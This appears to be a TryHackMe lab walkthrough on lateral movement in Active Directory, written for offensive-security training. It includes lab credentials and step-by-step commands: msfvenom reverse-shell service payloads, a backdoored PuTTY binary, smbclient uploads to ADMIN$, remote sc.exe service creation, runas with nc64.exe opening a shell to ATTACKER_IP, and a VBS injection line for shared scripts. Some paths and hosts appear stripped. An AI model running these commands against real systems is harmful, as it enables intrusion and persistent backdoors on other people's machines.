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What is Lateral Movement?

Simply put, lateral movement is the group of techniques used by attackers to move around a network. Once an attacker has gained access to the first machine of a network, moving is essential for many reasons, including the following: - Reaching our goals as attackers - Bypassing network restrictions in place - Establishing additional points of entry to the network - Creating confusion and avoid detection.

While many cyber kill chains reference lateral movement as an additional step on a linear process, it is actually part of a cycle. During this cycle, we use any available credentials to perform lateral movement, giving us access to new machines where we elevate privileges and extract credentials if possible. With the newfound credentials, the cycle starts again.


To complete this exercise, you will need to connect to THMJMP2 using the credentials assigned to you in Task 1 from If you haven't done so yet, click on the link and get credentials now. Once you have your credentials, connect to THMJMP2 via SSH:

ssh za\<AD Username>

For this exercise, we will assume we have already captured some credentials with administrative access:

User: ZA.TRYHACKME.COMt1_leonard.summers

Password: EZpass4ever

We'll show how to use those credentials to move laterally to THMIIS using sc.exe. Feel free to try the other methods, as they all should work against THMIIS.

While we have already shown how to use sc to create a user on a remote system (by using net user), we can also upload any binary we'd like to execute and associate it with the created service. However, if we try to run a reverse shell using this method, we will notice that the reverse shell disconnects immediately after execution. The reason for this is that service executables are different to standard .exe files, and therefore non-service executables will end up being killed by the service manager almost immediately. Luckily for us, msfvenom supports the exe-service format, which will encapsulate any payload we like inside a fully functional service executable, preventing it from getting killed.

To create a reverse shell, we can use the following command:

Note: Since you will be sharing the lab with others, you'll want to use a different filename for your payload instead of "myservice.exe" to avoid overwriting someone else's payload.

user@AttackBox$ msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=ATTACKER_IP LPORT=4444 -o myservice.exe

We will then proceed to use t1_leonard.summers credentials to upload our payload to the ADMIN$ share of THMIIS using smbclient from our AttackBox:

user@AttackBox$ smbclient -c 'put myservice.exe' -U t1_leonard.summers -W ZA '//$/' EZpass4ever
putting file myservice.exe as myservice.exe (0.0 kb/s) (average 0.0 kb/s)

Once our executable is uploaded, we will set up a listener on the attacker's machine to receive the reverse shell from msfconsole:

user@AttackBox$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST lateralmovement
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on

Alternatively, you can run the following one-liner on your Linux console to do the same:

user@AttackBox$ msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 4444;exploit"

Since sc.exe doesn't allow us to specify credentials as part of the command, we need to use runas to spawn a new shell with t1_leonard.summer's access token. Still, we only have SSH access to the machine, so if we tried something like runas /netonly /user:ZAt1_leonard.summers cmd.exe, the new command prompt would spawn on the user's session, but we would have no access to it. To overcome this problem, we can use runas to spawn a second reverse shell with t1_leonard.summers access token:
THMJMP2: Command Prompt

C:> runas /netonly /user:ZA.TRYHACKME.COMt1_leonard.summers "c:toolsnc64.exe -e cmd.exe ATTACKER_IP 4443"

Note: Remember that since you are using runas with the /netonly option, it will not bother to check if the provided credentials are valid (more info on this on the Enumerating AD room), so be sure to type the password correctly. If you don't, you will see some ACCESS DENIED errors later in the room.

We can receive the reverse shell connection using nc in our AttackBox as usual:

user@AttackBox$ nc -lvp 4443

And finally, proceed to create a new service remotely by using sc, associating it with our uploaded binary:
THMJMP2: Command Prompt (As t1_leonard.summers)

C:> sc.exe \ create THMservice-3249 binPath= "%windir%myservice.exe" start= auto
C:> sc.exe \ start THMservice-3249

Abusing Writable Shares

It is quite common to find network shares that legitimate users use to perform day-to-day tasks when checking corporate environments. If those shares are writable for some reason, an attacker can plant specific files to force users into executing any arbitrary payload and gain access to their machines.

One common scenario consists of finding a shortcut to a script or executable file hosted on a network share.

PuTTY lnk file

The rationale behind this is that the administrator can maintain an executable on a network share, and users can execute it without copying or installing the application to each user's machine. If we, as attackers, have write permissions over such scripts or executables, we can backdoor them to force users to execute any payload we want.

Although the script or executable is hosted on a server, when a user opens the shortcut on his workstation, the executable will be copied from the server to its %temp% folder and executed on the workstation. Therefore any payload will run in the context of the final user's workstation (and logged-in user account).

Backdooring .vbs Scripts

As an example, if the shared resource is a VBS script, we can put a copy of nc64.exe on the same share and inject the following code in the shared script:

CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \ %tmp% & %tmp%nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True

This will copy nc64.exe from the share to the user's workstation %tmp% directory and send a reverse shell back to the attacker whenever a user opens the shared VBS script.

Backdooring .exe Files

If the shared file is a Windows binary, say putty.exe, you can download it from the share and use msfvenom to inject a backdoor into it. The binary will still work as usual but execute an additional payload silently. To create a backdoored putty.exe, we can use the following command:

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "x00" -f exe -o puttyX.exe

The resulting puttyX.exe will execute a reverse_tcp meterpreter payload without the user noticing it. Once the file has been generated, we can replace the executable on the windows share and wait for any connections using the exploit/multi/handler module from Metasploit.

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